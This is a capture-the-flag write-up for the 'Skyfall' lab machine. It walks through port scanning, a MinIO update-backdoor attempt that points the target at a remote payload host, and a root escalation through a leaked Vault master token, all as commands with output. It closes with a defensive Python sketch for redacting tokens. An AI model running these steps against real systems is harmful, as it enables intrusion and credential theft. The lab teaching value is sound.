```
# Nmap 7.94SVN scan initiated Mon Feb 5 03:50:17 2024 as: nmap -sCV -T4 --min-rate 10000 -p- -v -oA nmap/tcp_default 10.129.216.173
Nmap scan report for 10.129.216.173
Host is up (0.027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_  256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 5 03:50:32 2024 -- 1 IP address (1 host up) scanned in 14.17 seconds
```
Only ports 22 and 80 are open, so we are probably dealing with a web server. I did not find any open UDP ports.
2. Webserver
We can see the domain name on the about us contact information:
The domain is skyfall.htb; the rest of the website looks like a stock page, so we may try to fuzz for vhosts.
We find “demo” as a vhost and add it to our hosts file.
http://demo.skyfall.htb/login
We find a login page that tells us the demo login is guest/guest. If we log in, we see a dashboard with a lot of functionality:
I also noticed that sky storage is powered by Flask:
This would mean that the backend is Python-based.
File functionality
There is file upload/download functionality, similar to Dropbox. If we download a file, we see this request:
It fetches the file by filename only. Maybe there is a check in the background against our session, but let's test for LFI by changing welcome.pdf to ../../../../etc/passwd. If we hit send, we see an error:
It is an S3 "operation failed" error saying that our signature does not match. Now we know that the app is using S3 buckets. We could also see a “MinIO metrics” page, but we cannot access it as user guest. This led me to the GitHub repo “evil_minio” https://github.com/AbelChe/evil_minio, which states that:
Our attack path would be:
1. Get credentials with arn:aws:s3 permissions.
2. Configure a MinIO client to interact with the vulnerable instance using the credentials obtained in step 1. For this, the following commands are required:
   `mc alias set [ALIAS] [URL_TARGET_MINIO] [ACCESS_KEY] [SECRET_KEY]`
   `mc alias list`
3. Attackers trigger the update process on the compromised MinIO instance, pointing to a malicious payload hosted on a remote server. For this, the following command is executed:
   `mc admin update [ALIAS] [MIRROR_URL] --yes`
4. “Evil” MinIO is installed, now containing a global backdoor that allows the attacker to execute commands on the host.
We can find an information disclosure vulnerability, but we would need to know the S3 bucket subdomain. We can find the domain with a 403 bypass on the /metrics page:
```
┌──(kali㉿kali)-[~/htb/skyfall]
└─$ ./mc admin update miniobreachuser http://10.10.14.118:8080/minio -y
mc: <ERROR> Unable to update the server. The specified method is not allowed against this resource.
```
3. User askyy
Let's continue by enumerating the bucket. We can ls it recursively, including object versions, to list the files:
```
──(kali㉿kali)-[~/htb/skyfall]
└─$ ./mc ls --recursive --versions miniobreachuser
[2023-11-07 23:59:15 EST]     0B askyy/
[2023-11-08 00:35:28 EST]  48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-09 16:37:25 EST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-09 16:37:09 EST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-09 16:36:30 EST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
```
```
This system has been minimized by removing packages and content that are not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
askyy@skyfall:~$ id
uid=1000(askyy) gid=1000(askyy) groups=1000(askyy)
```
4. PE to root
Askyy can run two commands as root:
```
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
```
If we use -d for debug mode, we can see that it writes its output to debug.log:
```
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ ls
debug.log  user.txt
```
The file belongs to root (rm warns that it is write-protected). However, it sits in our home directory, so we can remove it, create an empty debug.log ourselves and chmod 777 it before running the tool again:
```
askyy@skyfall:~$ rm debug.log
rm: remove write-protected regular file 'debug.log'? y
askyy@skyfall:~$ touch debug.log
askyy@skyfall:~$ chmod 777 debug.log
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
askyy@skyfall:~$ cat debug.log
2024/02/05 12:20:46 Initializing logger...
2024/02/05 12:20:46 Reading: /etc/vault-unseal.yaml
2024/02/05 12:20:46 Security Risk!
2024/02/05 12:20:46 Master token found in config: hvs.I0ewVsmaKU1SwVZAKR3T0mmG
2024/02/05 12:20:46 Found Vault node: http://prd23-vault-internal.skyfall.ht
```
Now we have the master token “hvs.I0ewVsmaKU1SwVZAKR3T0mmG”. With it we can ask Vault to generate an SSH OTP for root:
```
┌──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator]
└─$ export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

┌──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator]
└─$ vault login
Token (will be hidden):
WARNING! The VAULT_TOKEN environment variable is set! The value of this

──(kali㉿kali)-[~/htb/skyfall/home_backup.tar.gz/terraform-generator]
└─$ curl \
    --header "X-Vault-Token: $VAULT_TOKEN" \
    --request POST \
    --data '{"ip":"10.129.216.173", "username":"root"}' \
    $VAULT_ADDR/v1/ssh/creds/admin_otp_key_role
{"request_id":"3f7d5821-7714-8810-c4b8-38e4a5e9fbe0","lease_id":"ssh/creds/admin_otp_key_role/HCx7t0alHiguezUYajSYvoeZ","renewable":false,"lease_duration":2764800,"data":{"ip":"10.129.216.173","key":"742da986-bdee-febe-24b1-cefd4c007b49","key_type":"otp","port":22,"username":"root"},"wrap_info":null,"warnings":null,"auth":null}
```
```
This system has been minimized by removing packages and content that are not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jan 30 12:17:37 2024
root@skyfall:~# id
uid=0(root) gid=0(root) groups=0(root)
```
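Two things made this escalation possible: the tool logged the raw master token, and, running as root, it wrote into a debug.log that an unprivileged user had pre-created world-writable in the working directory. As an added example (not the box's vault-unseal code), here is a Python sketch of how a tool like it could avoid both: a logging filter that masks Vault tokens by their prefix (hvs./hvb./hvr., legacy s.) before the line reaches the file, plus an O_EXCL/0600 open so a pre-planted log file is refused. The token regex, the logger name and the demo log lines are assumptions.

```python
import logging
import os
import re
import tempfile

# Vault token prefixes: hvs. (service), hvb. (batch), hvr. (recovery), legacy s.
# The minimum body length is an assumption; real tokens are longer than 20 chars.
VAULT_TOKEN_RE = re.compile(r"\b(?:hv[sbr]|s)\.[A-Za-z0-9_-]{20,}")

def redact(text: str) -> str:
    """Mask every Vault token in text, keeping only its type prefix."""
    return VAULT_TOKEN_RE.sub(lambda m: m.group(0).split(".", 1)[0] + ".[REDACTED]", text)

class RedactVaultTokens(logging.Filter):
    """Rewrite the record in place so the raw token never reaches a handler."""
    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(record.getMessage())
        record.args = ()  # message is already fully formatted
        return True

def write_debug_log(path: str, lines: list) -> str:
    """Log lines to path and return the file contents."""
    # O_EXCL + 0600: if debug.log already exists (e.g. a world-writable one planted
    # by an unprivileged user), refuse rather than write root's output into it.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    stream = os.fdopen(fd, "w")
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
    handler.addFilter(RedactVaultTokens())
    logger = logging.getLogger("vault-unseal-demo")
    logger.setLevel(logging.DEBUG)
    logger.propagate = False
    logger.addHandler(handler)
    try:
        for line in lines:
            logger.debug(line)
    finally:
        logger.removeHandler(handler)
        handler.close()
        stream.close()
    with open(path) as f:
        return f.read()

def demo_run() -> tuple:
    """Constructed lines mirroring the writeup's debug.log; returns (contents, mode)."""
    token = "hvs.EXAMPLEtokenFromConfig0000"  # constructed placeholder, not a real token
    path = os.path.join(tempfile.mkdtemp(), "debug.log")
    text = write_debug_log(path, ["Reading: /etc/vault-unseal.yaml",
                                  "Master token found in config: " + token])
    return text, os.stat(path).st_mode & 0o777
```

Running demo_run() a second time against an existing debug.log raises FileExistsError, which is the intended behaviour for a root-run tool.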